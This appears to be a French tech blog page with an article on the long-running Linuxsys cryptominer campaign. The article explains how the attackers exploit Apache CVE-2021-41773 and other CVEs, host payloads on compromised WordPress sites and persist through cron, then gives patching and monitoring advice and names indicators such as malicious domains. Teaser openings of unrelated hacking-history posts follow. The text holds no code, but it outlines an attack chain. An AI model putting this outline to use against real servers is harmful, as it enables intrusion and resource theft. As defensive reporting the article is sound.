Et si vous avez le module mod_cgi activé avec “Require all granted” dans votre config (ce qui est une très mauvaise idée), les attaquants peuvent carrément exécuter du code sur votre machine. Là, c’est la fête du slip.

Et les cybercriminels ne stockent pas leur malware sur leurs propres serveurs. Non, non, ils compromettent des sites WordPress légitimes et s’en servent comme dépôt. Du coup, quand votre serveur télécharge le cryptominer, il le fait depuis un site avec un certificat SSL valide qui a l’air tout ce qu’il y a de plus normal.

Le script d’installation est d’ailleurs assez basique. Il télécharge le binaire “linuxsys”, un fichier de config, et installe une tâche cron pour que le miner redémarre automatiquement après un reboot. Les commentaires dans le code sont en soundanais (une langue indonésienne), ce qui donne une petite idée de l’origine des attaquants. Et les mecs derrière Linuxsys ne se contentent pas d’exploiter CVE-2021-41773 car ils ont tout un arsenal de vulnérabilités dans leur besace :

• CVE-2024-36401 sur GeoServer
• CVE-2023-22527 sur Atlassian Confluence
• CVE-2023-34960 sur Chamilo LMS
• CVE-2023-38646 sur Metabase
• Et même des failles récentes sur les pare-feux Palo Alto

En gros, si vous avez un truc pas à jour qui traîne sur Internet, y’a de bonnes chances que Linuxsys finisse par toquer à votre porte.

Alors, comment se protéger de cette merde ? C’est pas sorcier :

1. Patchez Apache, bordel ! La version 2.4.51 date d’octobre 2021. Si vous êtes encore en 2.4.49 ou 2.4.50, vous méritez presque de vous faire pwn.
2. Bloquez les domaines malveillants dans votre firewall, notamment repositorylinux.org et les sites WordPress compromis connus.
3. Surveillez votre CPU. Si votre serveur se met à consommer comme un gamer qui lance Cyberpunk 2077 en ultra, c’est louche.
4. Checkez vos connexions sortantes. Si vous voyez du trafic TLS vers pool.hashvault.pro, c’est mort, vous minez pour les autres.
5. Désactivez les modules Apache inutiles et surtout, ne mettez JAMAIS “Require all granted” sur tout votre filesystem. C’est comme laisser vos clés sur la porte d’entrée.

Le plus rageant dans cette histoire, c’est que cette campagne dure depuis 2021. Mêmes attaquants, même méthode, même malware. Ils ont juste à attendre que de nouveaux serveurs mal configurés apparaissent sur le net et voilà.

Et n’oubliez pas. Si vous gérez des serveurs, abonnez-vous aux alertes de sécurité d’Apache et des autres softs que vous utilisez. Ça prend 2 minutes et ça peut vous éviter de finir en sueur dans un article comme celui-ci.

Bref, ces méchants hackers n’ont pas besoin d’être des génies, ils ont juste besoin que vous soyez négligents… Alors allez vérifier vos versions d’Apache maintenant !

Source

Si vous êtes du genre à penser que derrière les cyberattaques, c’est juste des Tanguy qui volent des mots de passe, j’ai une histoire qui va vous retourner le cerveau.

Le 24 novembre 2014, Sony Pictures s’est fait défoncer la tronche comme jamais à cause d’une comédie pourrave avec Seth Rogen qui voulait buter Kim Jong-un. Et je vous explique aujourd’hui pourquoi c’est l’un des hacks les plus dingues de l’histoire.

Phoenix, Arizona, 6 heures du mat’. Un gamin de 16 ans dort paisiblement dans sa chambre, entouré de posters de Star Wars et de boîtes de pizza vides pendant que dehors, une dizaine d’agents armés jusqu’aux dents encerclent sa baraque…

Hé oui, aujourd’hui, je vais vous raconter comment 150 agents du Secret Service ont débarqué chez des ados boutonneux en pensant sauver l’Amérique. C’était le 8 mai 1990, et c’est devenu l’Opération Sundevil, la plus grosse opération anti-hacker de l’histoire.

12 noms. 12 officiers russes formellement identifiés et inculpés pour avoir piraté la démocratie occidentale. Pas des pseudos, pas des avatars, non, non, non, leurs vrais noms, leurs grades et leurs unités militaires. Viktor Netyksho, Boris Antonov, Dmitriy Badin… Une liste qui ressemble à un générique de film d’espionnage, sauf que ces types ont vraiment existé et ont vraiment foutu le bordel dans les élections américaines.